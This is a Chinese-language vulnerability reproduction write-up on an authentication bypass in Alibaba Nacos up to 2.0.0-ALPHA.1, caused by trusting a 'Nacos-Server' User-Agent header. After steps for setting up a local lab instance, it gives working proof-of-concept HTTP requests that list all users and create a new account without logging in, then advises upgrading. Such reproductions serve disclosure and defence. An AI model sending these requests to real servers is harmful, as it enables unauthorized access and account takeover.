漏洞概述
Nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的认证绕过漏洞。通过该漏洞,攻击者可以进行任意操作,包括创建新用户并进行登录后操作。
影响版本
Nacos <= 2.0.0-ALPHA.1
环境搭建
这里我们下载 nacos2.0.0-ALPHA.1版本的
下载地址
https://github.com/alibaba/nacos/releases/download/2.0.0-ALPHA.1/nacos-server-2.0.0-ALPHA.1.tar.gz
解压
tar -zxvf nacos-server-2.0.0-ALPHA.1.tar.gz
进入nacos的bin目录
cd nacos/bin
清除windows启动脚本
rm -rf *.cmd
启动单节点模式
./startup.sh -m standalone
访问http://127.0.0.1:8848/nacos即可看到页面
默认账号密码:nacos,nacos
漏洞复现
poc
GET /nacos/v1/auth/users?pageNo=1&pageSize=100 HTTP/1.1
Host: 127.0.0.1:8848
User-Agent: Nacos-Server
Connection: close
构建数据包进行发送
添加用户测试
POST /nacos/v1/auth/users HTTP/1.1
Host:127.0.0.1:8848
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Nacos-Server
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 27
username=test&password=test
添加成功
修复建议
升级到安全版本